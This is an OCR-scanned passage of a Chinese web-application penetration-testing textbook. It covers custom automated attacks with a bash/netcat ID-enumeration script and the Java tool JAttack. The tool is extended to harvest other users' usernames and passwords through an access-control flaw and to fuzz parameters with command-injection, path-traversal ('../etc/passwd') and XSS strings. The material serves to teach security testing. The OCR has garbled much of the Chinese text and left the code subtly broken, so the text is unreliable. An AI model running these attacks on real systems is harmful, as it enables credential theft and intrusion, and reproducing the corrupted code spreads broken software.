有 时 候 , 应 用 程序 可 能 会 以 同样 的 方式 响应 一 组 请 求 , 唯一 例外 的 是 有 些 时 候 它 会 设 定 一 个 
cookie。 例 如 ， 每 个 请 求 都 会 遇 到 相同 的 重 定 癌 ， 但 如 果 证 书 有 效 ， 应 用 程序 就 会 设 定 一 个 包含 
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会 话 令 牌 的 cookie。 客 户 闪 访问 重 定 回 得 到 的 内 容 取决 于 是 否 提 交 了 有 效 的 会 话 令 牌 。 

6. 时 间 延 迟 

少数 情况 下 , 无 论 提交 的 参数 是 否 有 效 ， 服 务 需 啊 应 返回 的 实际 内 容 可 能 完全 相同 ,但 是 它 
返回 啊 应 的 时 间 可 能 稍 有 不 同 。 例 如 ， 如 果 使 用 一 个 无 效 的 用 户 名 登录 , 应 用 程序 可 能 会 立即 通 
过 一 个 并 不 包含 太 多 信息 的 常规 消息 做 出 啊 应 。 但是， 如 果 提 交 的 是 有 效 的 用 户 名 ,应 用 程序 就 
需要 进行 各 种 后 端 处 理 来 确认 用 户 提交 的 证 书 , 其 中 一 些 处 理 可 能 要 进行 大 量 计 算 ， 如 有 果 发 现 证 
书 错误 , 再 返回 相同 的 消息 。 如 果 远 程 检测 到 这 种 时 间 差 异 , 就 可 以 用 它 来 确定 攻击 中 的 “ 触 点 ”。 
(其 他 类 型 的 软件 ， 如 旧版 的 OpenSSH 中 也 稼 各 发 现 这 种 漏洞 。) 























提示 。 选择“ 触 点 ”指标 的 主要 目的 是 找到 一 个 或 一 组 ( 如 果 结 合 在 一 起 ) 完全 可 靠 
的 “ 触 点 ”。 但 是 ， 在 一 些 攻 击 中 ,提前 并 不 知道 什么 是 “ 触 点 ”。 例 如， 当 渗 透 测试 
员 针 对 登录 功能 实施 攻击 ， 党 试 枚 举 用 户 名 时 ， 并 没有 一 个 有 效 的 用 户 名 可 帮助 他 确 


定 应 用 程序 在 遇 到 “ 触 点 ”时 的 行为 。 在 这 种 情况 下 ， 最 好 是 监控 应 用 程序 中 刚刚 描 
述 的 各 种 特征 ， 寻 找 其 中 出 现 的 任何 异常 现象 。 





14.2.3 ”编写 攻击 脚本 


假设 已 经 确定 以 下 URL， 如 果 提 交 一 个 有 效 的 PageNo 值 ， 它 将 返回 200 啊 应 码 ; 否则 它 就 
返回 500 响应 码 : 

http://mdsec.net/app/ShowPage.ashx?PageNo=10069 

这 个 请 求 /响应 对 满足 实施 自动 攻击 并 且 枚 举 有 效 页 面 ID 所 需要 的 两 个 条 件 。 

在 这 样 简单 的 情况 下 , 可 以 立即 创建 一 段 定制 的 脚本 , 实施 一 次 自动 攻击 。 例 如 , 下面 的 bash 
脚本 从 stdqin 读 取 一 组 潜在 的 页 面 ID ， 使 用 netcat 工 具 请 求 一 个 包含 每 个 ID 的 UREL， 同 时 记录 
服务 器 啊 应 的 第 一 行 ， 其 中 包含 HTTP 状 态 人 码 : 


#1! /bin/bash 








Server=-mdsec .net 


Port=80 


while read id 

do 

echo -ne "Sid\t" 

echo -ne "GET/app/ShowPage.ashx?PageNo=sid HTTP/1.0\r\nHost: SServer\r\n\r\n" 
| netcat S$server Sport | head -1 


done | tee outputfile 
用 一 个 适当 的 输入 文件 (input file ) 运行 这 段 脚 本 ， 得 到 以 下 输出 ， 可 以 迅速 从 中 确定 有 效 
的 页 面 ID: 
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~> ./Script <IDs.txt 








10060 HTTP/1.0 500 Internal Server Error 
10061 HTTP/1.0 500 Internal Server Error 
10062 HTTP/1.0 200 Ok 
10063 HTTP/1.0 200 Ok 
10064 HTTP/1.0 500 Internal Server Error 

















提示 Cygwin 环境 可 用 于 在 Windows 平 台 上 运行 bash 脚本 ; 此 外 ，UnxUtils 套 件 中 包 


含 大 量 有 用 的 GNU 实 用 工具 的 Win32 端 口 ， 如 head 和 grep。 





使 用 一 段 Windows 批 处 理 脚 本 也 可 以 达到 相同 的 目的 。 下 面 的 示例 使 用 cur1 工 具 生 成 请 求 ， 
并 通过 findstr 命 令 过 小 输 出 : 
for /f “tokens=1" %1 jn (IDs.txt)} do echo %1 AR curl 


mdsec.net/app/ShowPage.ashx?PageNo=%i -i -s | finastr /VB HTTP/1.C 
虽然 这 些 人 简单 的 脚本 非常 适 于 执行 一 些 不 太 复 森 的 任务 ,如 循环 浏览 一 组 参数 值 及 在 服务 冀 啊 
应 中 解析 某 个 属性 , 但 是 , 在 许多 情况 下 ， 可 能 需要 使 用 比 命令 行 脚本 更 强大 、 更 灵活 的 工具 。 我 
们 首选 一 种 适当 的 高 级 面 问 对 象 的 语言 , 它 必 须 便于 处 理 基 于 字符 串 的 数据 , 并 提供 文 持 套 接 字 和 
SSL 的 API。 满 足 这 些 标准 的 语言 包括 Java、C# 和 Python。 下 面 将 深入 分 析 一 个 使 用 Java 的 示例 。 




















14.2.4 JAttack 


JAttack 是 一 个 简单 但 功能 强大 的 工具 ， 通 过 它 ， 任 何人 只 要 懂得 一 些 编程 基础 知识 ， 就 可 
以 使 用 定制 自动 技巧 回应 用 程序 实施 强大 的 攻击 。 这 个 工具 的 完整 源 代码 可 从 本 书 的 同步 网 站 
( http://mdsec.net/wahh ) 下 载 。 但 是 ， 比 源 代 码 更 重要 的 是 使 用 这 个 工具 的 基本 技巧 ， 下 面 将 对 
此 进行 简要 说 明 。 

不 要 把 请 求 仅 当做 一 个 非 结 构 化 的 文本 块 处 理 , 而 是 要 利用 该 工具 理解 请 求 参 数 的 概念 : 它 
是 一 个 可 被 操控 ,并 以 特殊 方式 附加 在 请 求 上 的 命名 数据 ,请 求 参 数 可 能 出 现在 URL 请 求 字 符 串 、 
HTTP cookie 或 PosT 请 求 主体 中 。 下 面 创 建 一 个 Param 类 保存 相关 细节 。 


// JAttack.java 
// by Dafydd stuttard 
import java.net.*; 

















impPort Java.1i1o0o.*; 


class Param 

{ 
String name, value; 
TYPe type; 
boolean attack; 


Param(String name, String value, Type type, boolean attack) 
( 


this.name = name; 
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ts.valLue = value; 

this.type = type; 

this.attack = attack:; 
上 


enum Type 


{ 
URL, COOKIE, BODY 


} 


许多 时 修 , 请 求 中 包含 不 希望 在 某 个 特定 的 攻击 中 修改 的 参数 ; 但 为 了 成 功 实施 攻击 , 仍然 
需要 包含 这 些 参数 。 可 以 使 用 attack 字 段 标记 某 个 参数 是 否 可 在 当前 攻击 中 进行 修改 。 

要 以 一 种 特定 的 方式 修改 某 个 参数 的 值 , JAttack 工 具 必 须 理 解 攻击 有 效 载荷 的 概念 。 在 不 同 
类 型 的 攻击 中 ， 需 要 创建 各 种 有 效 载 售 源 (payload source )。 首 先 建立 一 个 所 有 有 效 载 傈 必须 执 
行 的 界面 ， 提 高 这 个 工具 的 灵活 性 : 

interface PayloadSsource 


' 

















boolean nextPayload'!(}).: 
VOid TeSet ( ) ; 
String getPayload'!{); 

} 


nextPayload 方 法 可 用 于 监控 有 效 载 傈 源 的 状态 ， 下 到 它 的 全 部 有 效 载 何 用 完 后 才 人 返回 
true。 reset 方 法 返回 有 效 载 何 源 起 始点 的 状态 。getPayloagd 方 法 返回 当前 有 效 载 傈 的 值 。 

在 枚 举 文档 的 示例 中 ， 想 要 修改 的 参数 包 售 一 个 数字 值 ， 因 此 首先 在 PayloadSource 界 面 
中 执行 一 个 类 ， 生 成 数字 有 效 载 傈 。 可 通过 这 个 类 指定 想 要 测试 的 数字 范围 : 

class PSNumbers implements PayloadSource 


{ 








int from, to, step, current; 








PSNumbers (jint from, int to, int step) 


| 





this.from = from; 
this.to = to; 
this.step = step; 
reset(),; 


} 


Public boolean nextPpayload!() 
( 

CuUurrent += step; 

return Current <= to; 


} 


public void Teset ( ) 


( 


Current = from - step; 
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} 


Public String getPayloadt() 
{ 
return JInteger.toString (current).: 
} 
} 


了 解 请 求 参数 与 有 效 载 向 源 的 概念 后 , 我 们 已 经 拥有 足够 的 资源 , 能 够 生成 请 求 并 人 处理 服务 
天 的 啊 应 。 首 先 ， 对 攻击 进行 一 些 配置 : 

class JAttack 

{ 








// attack config 
String host = "mdsec.net";} 


int port = 80; 


String method = "GET"; 
String url = "/app/ShowPage.ashx"; 
Param[] Params = new Paraml] 
{ 
new Param("PageNo", "10069", Param.Type.URL, true}), 


}; 
PayloadSource payloads = new PSNumbers{({10060, 10080, 1): 


这 个 配置 包含 目标 的 基本 信息 ， 创 建 一 个 叫做 PageNo 的 请 求 参数 ， 并 指定 10060 ~ 10080 为 
数 子 有 效 载 傈 源 的 光 围 。 

为 了 循环 浏览 一 系列 的 请 求 并 针对 多 个 参数 ， 需 要 保持 某 种 状态 。 使 用 一 个 简单 的 
nextRequest 方 法 监控 请 求 引 获 的 状态 ， 它 在 浏览 完 所 有 请 求 后 返回 true 值 。 

// attack state 

int currentParam = 0; 











boolean nextRedquest') 


{ 





' 


if (currentParam >= params. length,) 


return false: 


if (iPparams [currentParam]| .attack) 
{ 
CurrentParam++; 


return nextRequest{(); 


if (ipayloads.nextPayload!{}) 
| 
payloads .Yeset ( ) ; 
CurrentParam+t+;} 


return nextReaquest{(}); 


return true; 
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这 个 有 状态 的 请 求 引 区 将 妃 踪 当前 正 针 对 哪个 参数 ， 以 及 在 其 中 插入 了 什么 攻击 有 效 载 何 。 
接 下 来 使 用 这 些 信 息 建立 一 个 完整 的 HTTP 请 求 。 它 包括 在 请 求 中 插入 每 种 类 型 的 参数 ， 并 增加 
任何 必要 的 消息 头 。 


String bpulladqRedcuest ( ) 











// build parameters 


StringBuffer urlParams = new StringBuffer({(}); 





StringBuffer cookieparams = new StringBuffert{}: 
StringBuffer bodyParams = new StringBuffer(),; 
for (nt i = 0; i < params.length; i++) 
{ 
String value = {i == currentParam}) ? 
payloads .getPayloadt{) 
params [ 工 .value; 





if ‘params [i] .type == Param. Type.URL) 
urlParams.append(params [i] .name + "=" + Value + "&"); 
else if (Params [1I] .type == Param.Type.COORKIE) 
cookieParams .append{(params [i] .name + "=" + Value + "; "});: 
else if (params[i] .type == Param. Type.BODY) 
bodyParams.append (params [i]j .name + "=" + Value + "&");} 


// build request 
stringBuffer req = new StringBuffer!():} 


req.appendimethod + " " + url}); 
if (urlPparams. length() > 0) 

req.append("?" + urlPparams .substring{(0, urlparams.length{(}) - 1}}): 
req.appendt" HTTP/1.0\r\nHost: " + host); 


if (cookieParams.length() > 0) 

reg.appengd{("\r\nCookie: " + cookieParams .toString{(})); 
if (bodyParams.length() > 0) 
{ 


req.appendti"\r\nContent-Type: application/x-www-form-urlencoded").: 
regq.append{("\r\nContent-Length: " + {bodyParams.length() 一 1)}); 
req.append("\r\n\r\n"):; 
req.append (bodyParams .substring{(0, bodyParams.length{() - 1})):;: 

} 

else req.append("\r\nm\r\n"), 


return reg.toSstring!():; 


注解 如果 自己 编写 代码 生成 POST 请 求 ， 那 么 ， 和 在 前 面 的 代码 中 一 样 ， 就 需要 在 其 
中 包含 一 个 有 效 的 Content-Length 消 息 头 ， 指 定 每 个 请 求 中 HTTP 主 体 的 实际 长 度 。 


如 果 提 交 的 是 无 效 的 Content-Length， 大 多 数 Web 服 务 器 或 者 将 提交 的 数据 截 短 ， 
或 者 等 待 再 提交 更 多 的 数据 。 
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要 送出 请 求 ， 需 要 与 目标 Web 服 务 器 建立 网 络 连 接 。 使 用 Java 之 后 ， 建 立 TCP 连 接 、 提 交 数 
据 并 该 取 服 务 需 啊 应 的 任务 都 变 得 极其 简单 。 
String issueRequest (String reg}) throws UnknownHostException, IOFException 
{ 
Socket socket = new Socket (host, port).; 
OutputStream os = socket.getOutputSstreamt{}.; 


oS .writelreg.getBytes!()).;: 
oS.flush(i); 


BufferedReader br = new BuftferedReader (new InputSstreamReader ( 
Socket .getinputStream!()}))});: 

StringBuffer response = new StringBuffer!().; 

String line; 

while (null != (line = br.readLine{())) 


response.append (line}); 


oS.close(): 
br.close!{)}): 
return response.toSsString!(): 


} 
I 立 后 ， 需 要 解析 这 些 啊 应 ， 提 取出 相关 信息 ， 确 定 攻击 中 
的 “ 触 点 ”。 第 一 行 的 HTTP 状 态 码 与 响应 的 总 长 度 : 


String parseResponse (String response) 


| 











StringBuffer output = new StringBuffer!(); 


output.append (response.split("\\s+", 3)[1] + "\t"); 
output.append(Integer.toString (response.length(})})} + AN) 


return output.toString{(); 


| 
现在 已 经 为 实施 攻击 做 好 准备 。 最 后 只 需要 一 些 包 闭 善人 代 码 轮流 调用 前 面 提 到 的 每 一 个 方法 
并 指出 其 结果 ， 直到 提出 所 有 青 求 ， nextReduest 方 法 返回 false: 


void doaAttack!() 
{ 











System.out .printin("param\tpayload\tstatus\tlength"); 
String output = null,; 


while (nextRegquest!()}) 
{ 
try 
{ 
output = parseResponselissueRequest (buildRegquest ()) ) : 
} 
catch (Exception ee) 


{ 
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Output = e.toSstring(); 
} 
System.out.printlin(params [currentPparam] .name + "\t"” + 


Dayloagds.getPayloadl(}) + "\t" + OuUtput)}),; 
} 


public static void main(String[] args) 


{ 
new JAttack() .doAttack!{(): 
} 


整个 过 程 就 是 这 样 ! 为 编写 并 运行 这 些 代 码 ， 和 需要 下 载 Sun 公 司 的 Java SDK 与 JRE， 然 后 运 
行 下 面 的 脚本 : 


> Javac JRAttacCk . ] ava 








> Java JAttack 


根据 我 们 在 示例 中 的 配置 ， 这 个 工具 输出 如 下 结 


Daram Payload status length 
PageNo 10060 S00 3154 
PageNo 10061 S500 3154 
PageNo 10062 200 1083 
PageNo 10063 200 1080 
PageNo 10064 S500 3154 











如 果 网 络 连接 与 处 理 能 力 一 切 正 党 ，JAttack 每 分 钟 能 够 提出 数 白 个 请 求 ， 并 输入 相关 细 市 ， 
带 助 迅速 确 定 需要 进一步 研究 的 有 效 文 梢 标识 符 。 


尝试 访问 


http://mdsec.net/app/ 








看 起 来 ， 似 乎 刚刚 描述 的 攻击 并 不 比 前 面 只 需要 儿 行 代码 的 bashb 脚 本 实例 更 复杂 。 但是， 
JAttack 的 设计 形式 允许 对 它 进行 任意 修改 ， 从 而 实施 更 加 强大 的 攻击 ， 合 并 多 个 请 求 参数 、 各 
种 有 效 载荷 源 ， 并 对 响应 进行 任何 复杂 的 处 理 。 下 面 几 节 将 对 JAttack 的 代码 进行 一 些 修改 , 使 其 
实现 更 强大 的 功能 。 


14.3 ” 钓 取 有 用 的 效 气 


当 攻 击 应 用 程序 时 ,定制 目 动 化 技 马 的 第 二 个 主要 用 途 是 , 通过 专门 设计 的 特殊 请 求 ， 以 一 
次 一 个 数据 的 速度 获取 信息 ,从 而 提取 出 有 用 的 或 敏感 的 数据 。 如 来 已 经 确定 一 个 可 供 利用 的 源 
洞 (如 访问 控制 缺陷 )， 并 能 够 通过 为 一 个 未 授权 的 资源 指定 标识 符 的 方式 来 访问 这 个 资源 ， 那 
此 时 往往 就 会 出 现 这 种 情况 。 但 是 ,即使 应 用 程序 完全 按 设 计 痢 预计 的 方式 运行 ,也 可 能 会 出 现 
这 种 情况 。 在 下 面 这 些 情况 下 ， 渗 透 测 试 员 可 以 使 用 目 动 化 技巧 获取 数据 。 




















14.3 ”获取 有 用 的 数据 429 


口 一 个 网 上 和 零售 应 用 程序 允许 注册 用 户 碍 看 他 们 的 待 办 订单 。 但 是 ， 如 采 能 够 确定 其 他 用 
户 的 订单 号 ， 承 可 以 查看 他 们 的 订单 信息 ， 就 像 碍 看 目 己 的 订单 一 样 。 

D 态 记 密码 功能 的 实施 取决 于 用 户 配 置 的 质询 。 可 以 提交 任意 用 户 名 并 查看 相关 质询 。 通 
过 电 历 一 组 枚 举 或 猜测 出 来 的 用 户 名 ， 就 能 够 获得 大 量 用 户 密 码 质询 ， 从 而 确定 那些 最 
容易 猜测 的 质询 。 

口 一 个 工作 流程 应 用 程序 包含 一 项 功能 ， 可 显示 某 一 用 户 的 基本 账户 信息 ， 包 括 他 在 应 用 
程序 中 的 权限 。 通 过 过 有 历 应 用 程序 使 用 的 用 户 ID ， 渗 透 测试 员 就 能 够 列 出 所 有 的 管理 用 
户 ， 并 以 此 为 基础 进行 密码 猜测 和 其 他 攻击 。 

使 用 自动 化 技巧 获取 数据 的 基本 步 又 与 枚 举 有 效 标识 和 从 的 步骤 基本 类 似 ， 其 不 同 之 处 在 于 ， 现 

在 不 仅 对 一 个 二 进 制 结 末 〈“ 触 点 ”或 “错失 ”) 感 兴趣 ， 还 要 设法 从 每 个 啊 应 中 提取 有 用 的 内 容 。 

以 下 面 的 请 求 为 例 ， 它 由 登录 用 户 提 出 ， 以 显示 其 账户 信息 。 

GET /auth/498/YourDetails.ashx?uid=198 HTTP/1.1 


Host: mdsec.net 
Cookie: SessionId=0947F6DC9A66D29F15362DO31B337797 


里 然 只 有 通过 验证 的 用 户 能 够 访问 此 应 用 程序 功能 , 但 由 于 存在 访问 控制 源 洞 , 任何 用 户 只 
需 人 简单 修改 uid 参 数 ， 即 可 查看 其 他 所 有 用 户 的 详细 资料 。 在 男 一 个 漏洞 中 ,披露 的 详细 资料 还 
包括 用 户 的 完整 证 书 。 由 于 用 户 的 uiq 参 数值 相对 较 小 ， 因 此 ， 攻 击 者 能 够 轻易 推测 出 其 他 用 户 
的 标识 符 。 

当 应 用 程序 显示 一 个 用 户 的 资料 时 ， 页 面 源 代码 会 将 个 人 信息 包含 在 下 面 的 HTML 表 中 : 

< 七 工 > 


<td>Name: </td><td>Phill BellLena<y taq> 


</tr> 







































































<tIr> 

<td>Username: </td><td>phillb</td> 
</tr> 
< 七 匡 > 

<td>Password: </td><td>b311l3nd</td> 
</tr> 








根据 应 用 程序 的 行为 ,攻击 者 可 直接 实施 定制 日 动 攻 击 , 获取 所 有 应 用 程序 用 户 的 个 人 信息 ， 
包括 证 书 等 。 

为 实施 攻击 测试 , 我 们 快速 对 JAttack 工 具 进 行 一 些 改进 , 使 它 能 够 提取 并 记录 服务 问 啊 应 中 
的 特殊 数据 。 首 移 ,将 攻击 配置 数据 添加 到 源 代 码 的 字符 串 列 表 内 ,通过 它们 确定 想 要 提取 的 有 
用 内 容 : 


static final String[] extractStrinos = new Stringl[. 


{ 








"<td>Name: </td><to>", 
"<td>Username: </td><td>", 
"<td>Password: </td><td>" 
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然后 把 下 面 的 代码 添加 到 parseResponse 方 法 中 ， 以 在 每 个 啊 应 中 搜索 上 述 列表 中 的 每 
个 字符 串 ， 并 提取 字符 串 后 到 圆 括号 位 置 的 内 容 : 
for (String extract : extractSstrings) 


' 











int from = response.indexOof (extract); 
if {from == -1) 
continue; 


trom += extract,lengtht()}):; 


int to = response.indexOoOf ("<", from}): 
IE {to == -1) 
to = response. length'()}). 


output .append(response.subSequence (from, to} + "\t").: 


} 
这 就 是 对 这 个 工具 的 代码 进行 的 全 部 修改 。 为 配置 JAttack 针 对 我 们 感 兴趣 的 实际 请 求 , 需要 
对 它 的 攻击 配置 进行 如 下 更 新 : 


String Url = "/auth/498/YourDetails.ashx"; 
Param[] params = new Paraml] 
{ 
new Param!("SessionId", "0947F6DC9A66D29F15362DO31B3377977°,， 
Param.Type.COOKIE, false), 
new Param( "uid", "198", Param.Type.URL, true), 
}; 
PayloadSource payloads = new PSNumbers{190, 200, 1); 


这 个 配置 指示 JAttack 癌 相关 URL 提 出 包含 2 个 必要 参数 的 请 求 : 包含 当前 会 话 令 牌 的 cookie 
和 易 受 攻击 的 用 户 标 识 符 。 其 中 只 有 一 个 参数 会 通过 我 们 指定 的 uid 号 范围 进行 修改 。 
现在 再 运行 JAttack， 得 到 以 下 结果 : 




















uid 190 500 300 

uid 191 200 27489 Adam Matthews sixpack b4dllaht 
uid 192 200 28991 Pablina S Pablo puntitasth 
uid 193 200 29430 Shawn fattysh Gr3ggslu7 
uid 194 S500O 300 

uid 195 200 28224 RUth House ruth h lonelypu55 
uid 196 500 300 

uid 197 200 28171 Chardonnay VegasSc dangermouse 
ulid 198 200 27880 Phill Bellend phillb b3113nd 
uid 199 200 28901 Paul Byrne byrnsey ]33tfuzz 
ulid 200 200 27388 Peter Weiner Weiner skinthird 








可 见 , 这 次 攻击 成 功 筑 取 了 一 些 顾客 的 个 人 资料 。 通 过 扩大 攻击 的 数值 范围 ,我 们 可 以 提取 
应 用 程序 所 有 用 户 的 登录 信息 ， 很 有 可 能 还 包含 管理 员 。 
http://mdsec.net/auth/498/ 


注意 , 如果 对 此 实验 室 示 例 运 行 JAttack 代 人 码 , 则 需要 根据 应 用 程序 发 布 的 值 调整 攻击 配置 
中 使 用 的 UREL 、 会 话 cookie 和 用 户 ID 人 参数 。 
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提示 “以 制 表 符 分 隔 格 式 输出 的 数据 可 轻易 加 载 到 Excel 之 类 的 电子 表格 软件 中 ， 以 对 
其 进行 进一步 处 理 或 整理 。 许 多 时 候 ， 通 过 以 上 方法 获取 的 数据 可 用 作 其 他 自动 攻击 的 


输入 。 





14.4” 吊 见 漏 洞 异 糊 测 试 


定制 自动 化 技巧 的 第 三 个 主要 用 途 并 不 包含 利用 任何 已 知 的 漏洞 枚 举 或 提取 信息 , 而 是 使 用 14 
各 种 旨 在 造成 反常 行为 的 、 专 门 设计 的 攻击 字符 串 来 探查 应 用 程序 中 是 否 存 在 任何 常见 的 漏洞 。 
因为 以 下 原因 ， 与 前 面 描述 的 攻击 相 比 ， 这 种 类 型 的 攻击 更 加 缺乏 针对 性 。 

口 无 论 每 个 参数 的 正常 功能 是 什么 ,或 者 应 用 程序 希望 收 到 何 种 类 型 的 数据 ， 在 这 种 攻击 
中 ， 往 往 需要 提交 与 测试 应 用 程序 每 个 页 面 的 每 一 个 参数 相同 的 攻击 有 效 载 傈 。 这 些 有 
效 载 和 柯 有 时 叫 作 模 糊 测 试 字符 串 〈fazz string )。 

口 事先 并 不 知道 如 何 确定 “ 触 点 ”。 与 其 监控 应 用 程序 的 啊 应 ， 在 其 中 查找 特殊 的 指标 ， 还 
不 如 系统 性 地 截取 尺 可 能 多 的 数据 并 对 其 进行 审查 ， 确 定 攻击 字符 串 在 应 用 程序 中 触发 
有 反 茹 行为 的 情形 ， 然 后 再 做 深入 调查 。 

当 探 查 各 种 常见 的 Web 应 用 程序 漏洞 时 ， 一 些 漏洞 会 通过 特别 明显 的 应 用 程序 行为 表现 出 
来 ， 这 些 行为 包括 特定 的 错误 消息 或 HTTP 状 态 码 。 有 时 可 以 根据 这 些 漏洞 签名 来 探查 常见 的 汤 
洞 ; 而 且 ， 自 动 化 应 用 程序 漏洞 扫描 器 也 使 用 这 种 方法 来 确定 绝 大 多 数 的 湄 洞 ( 请 参阅 第 20 草 了 
解 相关 内 容 )。 然 而 ， 从 理论 上 讲 ， 辐 应 用 程序 提交 的 任何 测试 字符 串 都 会 产生 某 种 可 以 预料 的 
行为 , 在 特定 的 条 件 下 ,表明 应 用 程序 存在 某 种 漏洞 。 为 此 ,经 验 丰 富 的 攻击 者 使 用 定制 自动 化 
技巧 , 就 比 单单 使 用 全 自动 化 工具 更 有 效率 。 这 类 攻击 者 会 对 应 用 程序 啊 应 中 的 每 一 个 相关 细 市 
进行 全 面 分 析 ; 他 能 够 从 应 用 程序 设计 者 与 开发 者 的 角度 考虑 问题 。 此 外 ， 他 人 能够 发 现 并 调查 请 
求 与 啊 应 之 间 不 寻 篆 的 联系 ， 而 当前 还 没有 任何 工具 能 够 做 到 这 一 点 。 

功能 复杂 的 大 型 应 用 程序 中 包含 大 量 动态 页 面 ， 且 每 个 页 面 都 能 接受 各 种 参数 ,这 时 ,使 用 
自动 化 技巧 查找 漏洞 就 非常 有 用 。 手 动 测试 每 一 个 参数 , 并 追踪 应 用 程序 对 相关 请 求 啊 应 中 的 有 
关 细 节 ， 是 一 个 几乎 无 法 完成 的 任务 。 使 用 自动 化 工具 代替 完成 需要 手动 执行 的 任务 ,是 在 这 种 
应 用 程序 中 探查 漏洞 的 唯一 实用 的 方法 。 

确定 上 一 个 示例 中 的 访问 控制 不 完善 并 对 其 加 以 利用 后 ,我 们 还 可 以 实施 模糊 测试 攻击 来 检查 
各 种 基于 输入 的 漏洞 。 作 为 对 受 攻击 面 的 初步 测试 ， 我 们 决定 在 每 个 参数 中 轮流 提交 以 下 字符 串 。 

口 '，， 如 果 存 在 SQL 注 入 漏洞， 某 些 情况 下， 提交 这 个 字符 串 将 造成 一 个 错误 。 

口 ; /bin/1s， 如 果 存 在 命令 注入 漏洞 ， 提 交 这 个 字符 串 可 能 导致 无 法 预料 的 行为 。 

口 ../../../../../etc/passwd， 如 来 存在 路 径 吉 历 源 洞 ， 提 交 这 个 字符 串 可 能 生成 一 
个 不 同 的 啊 应 。 

口 xsstest， 如 条 这 个 字符 串 被 复制 到 服务 硕 的 啊 应 中 ， 那 么 应 用 程序 就 容易 受到 蜂 站 点 
脚本 攻击 。 
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我 们 将 对 JAttack 工 具 进 行 扩 展 ， 通 过 创建 一 个 新 的 有 效 载 集 源 ， 生 成 这 些 有 效 载 傈 ， 如 下 
所 未 : 


class PSFUuZZStrings implements PayloadSource 


{ 
static final String[] fuzzStrings = new Stringl[l] 
{ 
1 /bin/ls", Y../../../../../etc/passwd'", "xsstest" 
了 
int current = -1， 


Public boolean nextPayload!() 
{ 
CUrrent++; 
return current < fuzzStrings. length; 


} 


Public void reset!() 
{ 
CUrrent = -1， 


} 


Public String getPayloagdt) 
{ 
return fuzzStrings [currentl]; 


} 


注解 ”任何 探查 应 用 程序 安全 漏洞 的 重要 攻击 都 需要 使 用 许多 其 他 攻击 字符 串 ， 以 确 
定 其 他 薄弱 环节 和 前 面 提 到 的 漏洞 的 其 他 变化 形式 。 我 们 将 在 第 21 齐 提供 一 个 更 加 全 





面 的 列表 ， 列 出 在 对 Web 应 用 程序 进行 模糊 测试 时 需要 的 所 有 字符 串 。 











为 使 用 JAttack 进 行 模糊 测试 , 还 需要 扩展 它 的 啊 应 分 析 代 人 码 , 使 其 能 够 提供 更 多 与 应 用 程序 
响应 有 关 的 信息 。 显著 提 高 这 种 分 析 能 力 的 一 个 简单 办 法 , 就 是 在 每 个 啊 应 中 搜索 指示 出 现 菏 种 
有 反常 行为 的 第 见 子 符 串 和 错误 消 肯 ， 并 记录 它们 在 工具 的 输出 结 来 中 出 现 的 每 一 种 情况 。 

站 完 ， 在 攻击 配置 数据 中 添 加 想 要 搜索 的 字符 串 列 表 : 


static final String[] grepSstrings = new Stringl] 


{ 




















"error", "exception", "illegal", "quotation", "not found'", "xsstest" 
}; 
然后 插入 下 面 的 parseResponse 方 法 ， 以 在 啊 应 中 搜索 前 面 提 到 的 每 一 个 字符 串 ， 并 记录 
任何 发 现 的 字符 串 : 
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for (String grep : grepSstrings) 
if (response.indexOf (grep} != -1) 


output.appendlgrep + "\t"); 


提示 事实 证 明 ， 枚 举 应 用 程序 中 的 标识 符 时 ， 在 JAttack 中 合并 这 种 搜索 功能 往往 非 


常 有 有 用。 通常， 在 应 用 程序 的 响应 中 是 否 存 在 某 个 特殊 的 表达 式 是 出 现 “和 触 点 ”的 最 
可 靠 指 标 。 








我 们 可 以 利用 这 些 代码 建立 一 个 基本 的 Web 应 用 程序 漏洞 测试 项。 当 实 施 具 体 的 攻击 时 ， 测 14 
试 员 只 需 用 相关 的 请 求 细节 对 JAttack 进 行 配置 ， 指 示 它 攻击 每 一 个 参数 。 人 代码 如 下 所 不 : 


String host = "mdsec.net"; 














int port = 80; 
String method = "GET"; 
String url = "/auth/498/YourDetails.ashx"; 
Paraml|l] params = new Paramll] 
{ 
new Paraml(l"SessionId", "ClFSAFDD7DF969BDICD2CEA40A2E07D19", 
Param.Type.COOKIE, true), 


new Param{ "uid", "198", Param.Type.URL, true), 


PayloadSource payloads = new PSFuzzStrings{();} 
配置 这 些 细 市 后 就 可 以 开始 实施 攻击 。 在 几 秒 钟 内 ，JAttack 就 已 经 回 所 有 请 求 参数 提交 了 
攻击 有 效 载 傈 。 而 手动 提交 至 少 逢 要 几 分 钟 时 间 ， 审 查 并 分 析 应 用 程序 收 到 的 响应 则 需要 更 长 











时 间 。 

接 下 来 再 对 JAttack 的 输入 结 末 进行 手动 检查 , 尝试 确定 任何 表示 源 洞 存在 的 反常 行为 。 分 析 
下 面 这 上 段 输 出 摘录 : 

param payloaad status length 

SessionTIqd  ， 302 502 

Sessionld ;/bin/ls 302 502 

SessionId ../../../../../../etc/passwd 302 502 

SessionIid xsstest 302 502 

uid 200 2941 exception quotation 

uiqd ; /bin/ls 200 2895 exception 

uid .fetc/passwd 200 2915 excepntion 

uid XSStest 200 2898 exception xsstest 





对 于 修改 sessionId 人 参数 的 请 求 , 应 用 程序 返回 一 个 始终 为 相同 长 度 的 重 定 癌 啊 应 。 这 种 行 
为 并 不 表示 存在 任何 漏洞 。 这 并 不 奇怪 ， 因 为 在 登录 时 修改 会 话 令 牌 通常 会 使 当前 会 话 失效 ,用 
户 将 被 重 定 问 到 登录 页 面 。 

uid 人 参数 更 有 意思 。 对 这 个 参数 的 任何 修改 都 会 导致 一 个 包含 字符 串 exception 的 啊 应 。 这 
些 啊 应 的 长 度 可 变 , 表明 不 同 的 有 效 载 傈 会 导致 不 同 的 啊 应 , 因此 这 些 啊 应 可 能 并 不 是 稼 规 的 错 
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误 消 晨 。 而 且 ， 可 以 看 到 ， 提 交 单 引号 时 ， 应 用 程序 的 啊 应 包含 字符 串 quotation， 这 可 能 是 
SQL 错误 消息 的 一 部 分 ， 说 明 应 用 程序 可 能 存在 SQL 注入 漏洞 ， 我 们 应 进行 手动 测试 来 确认 这 一 
点 〈 请 参阅 第 9 章 )。 此 外 ,我们 还 发 现 ， 应 用 程序 的 响应 回 显 了 有 效 载 倚 xsstest。 因 此 应 进 一 
步 探查 这 种 行为 ,以 确定 是 否 可 以 利用 该 错误 消息 实施 路 站 点 脚本 攻击 (请 参阅 第 12 章 文 解 相 关 
内 容 )。 


尝试 访问 


http://mdsec.net/auth/498/ 
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JAttack 由 不 到 250 行 的 人 简单 代码 构成 ， 然 而 ， 当 对 一 个 回应 用 程序 提出 的 请 求 进行 模糊 测试 
